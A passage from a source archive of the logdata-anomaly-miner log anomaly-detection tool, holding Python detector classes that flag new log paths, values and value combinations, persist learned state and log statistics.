MissingMatchPathListValueDetector(MissingMatchPathValueDetector): """ This detector works similar to the MissingMatchPathValueDetector. It only can lookup values from a list of paths until one path really exists. It then uses this value as key to detect logAtoms belonging to the same data stream. This is useful when e.g. due to different log formats, the hostname, servicename or any other relevant channel identifier has alternative paths. """ def get_channel_key(self, log_atom): """Get the key identifying the channel this log_atom is coming from.""" for target_path in self.target_path_list: match_element = log_atom.parser_match.get_match_dictionary().get(target_path) if match_element is None: continue if isinstance(match_element.match_object, bytes): affected_log_atom_values = match_element.match_object.decode(AminerConfig.ENCODING) else: affected_log_atom_values = match_element.match_object return target_path, str(affected_log_atom_values) return None def send_event_to_handlers(self, anomaly_event_handler, event_data, log_atom, message_part): """Send an event to the event handlers.""" anomaly_event_handler.receive_event(self.analysis_string % self.__class__.__name__, 'Interval too large between values', message_part, event_data, log_atom, self) NewMatchIdValueComboDetector.py000066400000000000000000000327641437606560100367730ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This file defines the NewMatchIdValueComboDetector. detector to extract values from multiple LogAtoms and check, if the value combination was already seen before. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class NewMatchIdValueComboDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """ This class creates events when a new value combination for a given list of match data. Paths need to be found in log atoms with the same id value in a specific path. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, id_path_list, min_allowed_time_diff, persistence_id='Default', allow_missing_values_flag=False, learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list the list of values to extract from each match to create the value combination to be checked. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list the list of paths where id values can be stored in all relevant log event types. @param min_allowed_time_diff the minimum amount of time in seconds after the first appearance of a log atom with a specific id that is waited for other log atoms with the same id to occur. The maximum possible time to keep an incomplete combo is 2*min_allowed_time_diff @param persistence_id name of persistence file. @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object. @param learn_mode when set to True, this detector will report a new value only the first time before including it in the known values set automatically. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, id_path_list=id_path_list, min_allowed_time_diff=min_allowed_time_diff, persistence_id=persistence_id, allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) self.known_values = [] if persistence_data is not None: # Combinations are stored as list of dictionaries for record in persistence_data: self.known_values.append(record) logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) PersistenceUtil.add_persistable_component(self) self.id_dict_current = {} self.id_dict_old = {} self.next_shift_time = None def receive_atom(self, log_atom): """ Receive on parsed atom and the information about the parser match. @return True if a value combination was extracted and checked against the list of known combinations, no matter if the checked values were new or not. """ self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False id_match_element = None for id_path in self.id_path_list: # Get the id value and return if not found in this log atom. id_match_element = match_dict.get(id_path) if id_match_element is not None: break if id_match_element is None: return False timestamp = log_atom.get_timestamp() if timestamp is not None: if self.next_shift_time is None: self.next_shift_time = timestamp + self.min_allowed_time_diff if timestamp > self.next_shift_time: # Every min_allowed_time_diff seconds, process all combinations from id_dict_old and then override id_dict_old with # id_dict_current. This guarantees that incomplete combos are hold for at least min_allowed_time_diff seconds before # proceeding. self.next_shift_time = timestamp + self.min_allowed_time_diff if self.allow_missing_values_flag: for id_old in self.id_dict_old: self.process_id_dict_entry(self.id_dict_old[id_old], log_atom) self.id_dict_old = self.id_dict_current self.id_dict_current = {} if isinstance(id_match_element, list): id_match_object = [] for match_element in id_match_element: id_match_object.append(match_element.match_object) id_match_object = tuple(id_match_object) else: id_match_object = id_match_element.match_object # Find dictionary containing id and create ref to old or current dict (side effects) id_dict = None if id_match_object in self.id_dict_current: id_dict = self.id_dict_current elif id_match_object in self.id_dict_old: id_dict = self.id_dict_old else: id_dict = self.id_dict_current id_dict[id_match_object] = {} for target_path in self.target_path_list: # Append values to the combo. match_element = match_dict.get(target_path) if match_element is not None: if isinstance(match_element, list): values = [] matches = match_element for match_element in matches: if isinstance(match_element.match_object, bytes): values.append(match_element.match_object.decode(AminerConfig.ENCODING)) else: values.append(id_dict[id_match_object][target_path]) id_dict[id_match_object][target_path] = values else: if isinstance(match_element.match_object, bytes): id_dict[id_match_object][target_path] = match_element.match_object.decode(AminerConfig.ENCODING) else: id_dict[id_match_object][target_path] = match_element.match_object if len(id_dict[id_match_object]) == len(self.target_path_list): # Found value for all target paths. No need to wait more. self.process_id_dict_entry(id_dict[id_match_object], log_atom) del id_dict[id_match_object] self.log_success += 1 return True def process_id_dict_entry(self, id_dict_entry, log_atom): """Process an entry from the id_dict.""" if id_dict_entry not in self.known_values: # Combo is unknown, process and raise anomaly if self.learn_mode: self.known_values.append(id_dict_entry) self.log_learned_path_value_combos += 1 self.log_new_learned_values.append(id_dict_entry) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time analysis_component = {'AffectedLogAtomValues': [str(i) for i in list(id_dict_entry.values())]} event_data = {'AnalysisComponent': analysis_component} try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + repr( id_dict_entry) + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [repr(id_dict_entry) + os.linesep + original_log_line_prefix + data] for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New value combination(s) detected', sorted_log_lines, event_data, log_atom, self) def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, self.known_values) logging.getLogger(DEBUG_LOG_NAME).debug("%d persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.known_values: self.known_values.append(event_data) return f"Allowlisted path(es) {', '.join(self.target_path_list)} with {event_data}." def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes. Following" " new value combinations were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] NewMatchPathDetector.py000066400000000000000000000211631437606560100353450ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for new data paths. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class NewMatchPathDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when new data path was found in a parsed atom.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, persistence_id='Default', learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param learn_mode specifies whether new values should be learned. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.log_learned_paths = 0 self.log_new_learned_paths = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is None: self.known_path_set = set() else: self.known_path_set = set(persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def receive_atom(self, log_atom): """ Receive on parsed atom and the information about the parser match. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. Depending on this information, the caller may decide if it makes sense passing the parsed atom also to other handlers. """ self.log_total += 1 unknown_path_list = [] if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False for path in log_atom.parser_match.get_match_dictionary().keys(): if path not in self.known_path_set: unknown_path_list.append(path) if self.learn_mode: self.known_path_set.add(path) self.log_learned_paths += 1 self.log_new_learned_paths.append(path) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time if unknown_path_list: original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + repr( unknown_path_list) + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [repr(unknown_path_list) + os.linesep + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(unknown_path_list)} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New path(es) detected', sorted_log_lines, event_data, log_atom, self) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, list(self.known_path_set)) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.known_path_set.add(event_data) return f'Allowlisted path(es) {event_data} in {event_type}.' def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new paths in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_paths) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new paths in the last 60 minutes. Following new paths" " were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_paths, self.log_new_learned_paths) self.log_success = 0 self.log_total = 0 self.log_learned_paths = 0 self.log_new_learned_paths = [] NewMatchPathValueComboDetector.py000066400000000000000000000303231437606560100373200ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This file defines the basic NewMatchPathValueComboDetector detector. It extracts values from LogAtoms and check, if the value combination was already seen before. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class NewMatchPathValueComboDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when a new value combination for a given list of match data pathes were found.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id='Default', allow_missing_values_flag=False, learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object. @param learn_mode when set to True, this detector will report a new value only the first time before including it in the known values set automatically. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) self.known_values_set = set() self.load_persistence_data() PersistenceUtil.add_persistable_component(self) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: # Set and tuples were stored as list of lists. Transform the inner lists to tuples to allow hash operation needed by set. self.known_values_set = {tuple(record) for record in persistence_data} logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def receive_atom(self, log_atom): """ Receive on parsed atom and the information about the parser match. @return True if a value combination was extracted and checked against the list of known combinations, no matter if the checked values were new or not. """ self.log_total += 1 if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False match_dict = log_atom.parser_match.get_match_dictionary() match_value_list = [] for target_path in self.target_path_list: match_element = match_dict.get(target_path) if match_element is None: if not self.allow_missing_values_flag: return False match_value_list.append(None) else: matches = [] if isinstance(match_element, list): matches = match_element else: matches.append(match_element) for match_element in matches: match_value_list.append(match_element.match_object) match_value_tuple = tuple(match_value_list) affected_log_atom_values = [] for match_value in match_value_list: if isinstance(match_value, bytes): match_value = match_value.decode(AminerConfig.ENCODING) affected_log_atom_values.append(str(match_value)) if match_value_tuple not in self.known_values_set: if self.learn_mode: self.known_values_set.add(match_value_tuple) self.log_learned_path_value_combos += 1 self.log_new_learned_values.append(match_value_tuple) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': affected_log_atom_values} event_data = {'AnalysisComponent': analysis_component} try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [str(match_value_tuple) + os.linesep + original_log_line_prefix + data] for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New value combination(s) detected', sorted_log_lines, event_data, log_atom, self) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, list(self.known_values_set)) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.known_values_set.add(event_data) return f"Allowlisted path(es) {', '.join(self.target_path_list)} with {event_data}." def add_to_persistency_event(self, event_type, event_data): """ Add or overwrite the information of event_data to the persistence of component_name. @return a message with information about the addition to the persistence. @throws Exception when the addition of this special event using given event_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, list) or len(event_data) != len(self.target_path_list): msg = 'Event_data has the wrong format.' \ 'The supported format is [value_1, value_2, ..., value_n] where n is the number of analyzed paths.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) match_value_list = [] for match_element in event_data: if match_element is None: if not self.allow_missing_values_flag: msg = 'Empty entry detected in event_data.' \ 'Please fill entry or set parameter allow_missing_values_flag to true.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) match_value_list.append(None) else: match_value_list.append(bytes(match_element, 'utf-8')) match_value_tuple = tuple(match_value_list) if match_value_tuple not in self.known_values_set: self.known_values_set.add(match_value_tuple) self.log_learned_path_value_combos += 1 self.log_new_learned_values.append(match_value_tuple) return f"Added values [{', '.join(event_data)}] of paths [{', '.join(self.target_path_list)}] to the persistence." def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes." " Following new value combinations were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] NewMatchPathValueDetector.py000066400000000000000000000233121437606560100363400ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for new values in a data path. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class NewMatchPathValueDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when new values for a given data path were found.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id='Default', learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param learn_mode when set to True, this detector will report a new value only the first time before including it in the known values set automatically. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.log_learned_path_values = 0 self.log_new_learned_values = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is None: self.known_values_set = set() else: self.known_values_set = set(persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False for target_path in self.target_path_list: match = match_dict.get(target_path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) affected_log_atom_values = [] for match in matches: if match.match_object not in self.known_values_set: if self.learn_mode: self.known_values_set.add(match.match_object) self.log_learned_path_values += 1 self.log_new_learned_values.append(match.match_object) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time if isinstance(match.match_object, bytes): affected_log_atom_values.append(match.match_object.decode(AminerConfig.ENCODING)) else: affected_log_atom_values.append(str(match.match_object)) if len(affected_log_atom_values) > 0: analysis_component = {'AffectedLogAtomPaths': [target_path], 'AffectedLogAtomValues': affected_log_atom_values} if isinstance(match_dict.get(target_path), list): res = {target_path: affected_log_atom_values} else: res = {target_path: match_dict.get(target_path).match_object} if isinstance(res[target_path], bytes): res[target_path] = res[target_path].decode(AminerConfig.ENCODING) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [str(res) + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [str(res)] event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New value(s) detected', sorted_log_lines, event_data, log_atom, self) self.log_success += 1 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, list(self.known_values_set)) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.known_values_set.add(event_data) return f"Allowlisted path(es) {', '.join(self.target_path_list)} with {event_data}." def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. 